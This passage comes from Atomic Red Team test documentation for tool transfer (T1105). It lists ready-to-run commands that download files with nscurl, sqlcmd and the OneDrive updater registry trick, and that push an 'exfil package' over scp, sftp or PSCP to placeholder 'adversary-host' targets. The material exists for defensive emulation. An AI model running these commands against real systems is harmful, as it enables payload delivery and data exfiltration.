Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/bin/GUP.exe" -OutFile "#{gup_executable}"


Atomic Test #31 - File download via nscurl

Use nscurl to download and write a file/payload from the internet. -k = Disable certificate checking -o = Output destination

Supported Platforms: macOS

auto_generated_guid: 5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c

Inputs:

NameDescriptionTypeDefault Value
remote_fileURL of remote file to downloadurlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt (opens in a new tab)
destination_pathLocal path to place remote filepathlicense.txt

Attack Commands: Run with sh!

nscurl -k "#{remote_file}" -o "#{destination_path}"

Cleanup Commands:

rm "#{destination_path}"


Atomic Test #32 - File Download with Sqlcmd.exe

One of the windows packages 'Sqlcmd.exe' can be abused to download malicious files from C2 servers This Atomic will exhibit the similar behavior by downloading a sample zip file from src directory of this Technique folder via GitHub URL

Supported Platforms: Windows

auto_generated_guid: 6934c16e-0b3a-4e7f-ab8c-c414acd32181

Inputs:

NameDescriptionTypeDefault Value
remote_urlURL of the C2 Server from where file/s need to be downloadedurlhttps://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip (opens in a new tab)
local_file_pathThe local file path along with filename to where the file needs to be downloaded and placed.pathC:\T1105.zip

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

sqlcmd -i #{remote_url} -o #{local_file_path}

Cleanup Commands:

rm "#{local_file_path}" 2>$null | Out-Null

Dependencies: Run with powershell!

Description: Windows package 'Sqlcmd' need to be available in the machine to execute this atomic successfully
Check Prereq Commands:
if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1}
Get Prereq Commands:
winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null


Atomic Test #33 - Remote File Copy using PSCP

Copy a staged file using PSCP.exe to a public target location.

Supported Platforms: Windows

auto_generated_guid: c82b1e60-c549-406f-9b00-0a8ae31c9cfe

Inputs:

NameDescriptionTypeDefault Value
pscp_urlpscp.exe download pathstringhttps://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe (opens in a new tab)
pscp_binaryPSCP binary locationstringPathToAtomicsFolder\..\ExternalPayloads\pscp.exe
scp_userUsername of the SCP userstringatomic
scp_passwordPassword for the SCP Userstringatomic
scp_portport for the remote serverstring22
exfil_packagepath to exfil packagepathC:\Temp\T1105_scp.zip
target_locationRemote location where the data will be copied to.string127.0.0.1
target_filenameFilename on the destination.stringT1105_scp.zip

Attack Commands: Run with command_prompt!

fsutil file createnew C:\Temp\T1105_scp.zip 1048576
echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename}

Cleanup Commands:

del /f /q #{exfil_package}

Dependencies: Run with powershell!

Description: pscp.exe must be available on the system.
Check Prereq Commands:
if (Test-Path #{pscp_binary}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"


Atomic Test #34 - Windows push file using scp.exe

This test simulates pushing files using SCP on a Windows environment.

Supported Platforms: Windows

auto_generated_guid: 2a4b0d29-e5dd-4b66-b729-07423ba1cd9d

Inputs:

NameDescriptionTypeDefault Value
remote_pathPath of folder to copypath/tmp/
remote_hostRemote host to sendstringadversary-host
local_pathLocal path to copy frompathC:\temp
file_nameName of the file to transferstringT1105.txt
usernameUser account to authenticate on remote hoststringadversary

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

# Check if the folder exists, create it if it doesn't
$folderPath = "#{local_path}"
if (-Not (Test-Path -Path $folderPath)) {
    New-Item -Path $folderPath -ItemType Directory
}
 
# Create the file
$filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}"
New-Item -Path $filePath -ItemType File -Force
Write-Output "File created: $filePath"
 
# Attack command
scp.exe #{local_path}\#{file_name} #{username}@#{remote_host}:#{remote_path}

Cleanup Commands:

$filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
Remove-Item -Path $filePath -Force -erroraction silentlycontinue
Write-Output "File deleted: $filePath"

Dependencies: Run with powershell!

Description: This test requires the scp command to be available on the system.
Check Prereq Commands:
if (Get-Command scp -ErrorAction SilentlyContinue) {
    Write-Output "SCP command is available."
    exit 0
} else {
    Write-Output "SCP command is not available."
    exit 1
}
Get Prereq Commands:
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
    # Install the OpenSSH Client capability
    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
    # Handle any errors that occur during the installation process
    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}


Atomic Test #35 - Windows pull file using scp.exe

This test simulates pulling files using SCP on a Windows environment.

Supported Platforms: Windows

auto_generated_guid: 401667dc-05a6-4da0-a2a7-acfe4819559c

Inputs:

NameDescriptionTypeDefault Value
remote_pathPath of folder to pullpath/tmp/T1105.txt
remote_hostRemote host to pull fromstringadversary-host
local_pathLocal path to receive filespathC:\temp
usernameUser account to authenticate on remote hoststringadversary

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

scp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}

Dependencies: Run with powershell!

Description: This test requires the scp command to be available on the system.
Check Prereq Commands:
if (Get-Command scp -ErrorAction SilentlyContinue) {
    Write-Output "SCP command is available."
    exit 0
} else {
    Write-Output "SCP command is not available."
    exit 1
}
Get Prereq Commands:
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
    # Install the OpenSSH Client capability
    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
    # Handle any errors that occur during the installation process
    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}


Atomic Test #36 - Windows push file using sftp.exe

This test simulates pushing files using SFTP on a Windows environment.

Supported Platforms: Windows

auto_generated_guid: 205e676e-0401-4bae-83a5-94b8c5daeb22

Inputs:

NameDescriptionTypeDefault Value
remote_pathPath of folder to copypath/tmp
remote_hostRemote host to sendstringadversary-host
local_pathLocal path to receive sftppathC:\temp
file_nameName of the file to transferstringT1105.txt
usernameUser account to authenticate on remote hoststringadversary

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

# Check if the folder exists, create it if it doesn't
$folderPath = "#{local_path}"
if (-Not (Test-Path -Path $folderPath)) {
    New-Item -Path $folderPath -ItemType Directory
}
# Create the file
$filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}"
New-Item -Path $filePath -ItemType File -Force
Write-Output "File created: $filePath"
# Attack command
echo "put #{local_path}\#{file_name}" | sftp #{username}@#{remote_host}:#{remote_path}

Cleanup Commands:

$filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
Remove-Item -Path $filePath -Force
Write-Output "File deleted: $filePath"

Dependencies: Run with powershell!

Description: This test requires the sftp command to be available on the system.
Check Prereq Commands:
if (Get-Command sftp -ErrorAction SilentlyContinue) {
    Write-Output "SFTP command is available."
    exit 0
} else {
    Write-Output "SFTP command is not available."
    exit 1
}
Get Prereq Commands:
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
    # Install the OpenSSH Client capability
    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
    # Handle any errors that occur during the installation process
    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}


Atomic Test #37 - Windows pull file using sftp.exe

This test simulates pulling files using SFTP on a Windows environment.

Supported Platforms: Windows

auto_generated_guid: 3d25f1f2-55cb-4a41-a523-d17ad4cfba19

Inputs:

NameDescriptionTypeDefault Value
remote_pathPath of file to pullpath/tmp/T1105.txt
remote_hostRemote host to pull fromstringadversary-host
local_pathLocal path to receive filespathC:\temp
usernameUser account to authenticate on remote hoststringadversary

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}

Dependencies: Run with powershell!

Description: This test requires the sftp command to be available on the system.
Check Prereq Commands:
if (Get-Command sftp -ErrorAction SilentlyContinue) {
    Write-Output "SFTP command is available."
    exit 0
} else {
    Write-Output "SFTP command is not available."
    exit 1
}
Get Prereq Commands:
# Define the capability name for OpenSSH Client
$capabilityName = "OpenSSH.Client~~~~0.0.1.0"
try {
    # Install the OpenSSH Client capability
    Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
    Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
} catch {
    # Handle any errors that occur during the installation process
    Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
}


Atomic Test #38 - Download a file with OneDrive Standalone Updater

Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys. This technique can be used to download files without executing anomalous executables. Reference: https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 3dd6a6cf-9c78-462c-bd75-e9b54fc8925b

Inputs:

NameDescriptionTypeDefault Value
remote_urlURL to download file fromurlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt (opens in a new tab)
onedrive_pathPath to OneDrive Standalone Updater executablepathC:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe

Attack Commands: Run with powershell!

if (-not (Test-Path "#{onedrive_path}")) {
    Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Test cannot continue."
    exit 1
}
 
New-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateRingSettingURLFromOC" -Value "#{remote_url}" -Type String -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "ODSUUpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateOfficeConfigTimestamp" -Value 99999999999 -Type QWord -Force
 
# Run OneDrive Standalone Updater
& "#{onedrive_path}"

Cleanup Commands:

Remove-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force -ErrorAction Ignore
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore

Dependencies: Run with powershell!

Description: OneDriveStandaloneUpdater.exe must exist on disk at specified location
Check Prereq Commands:
if (Test-Path "#{onedrive_path}") {exit 0} else {exit 1}
Get Prereq Commands:
Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Please install OneDrive or specify correct path."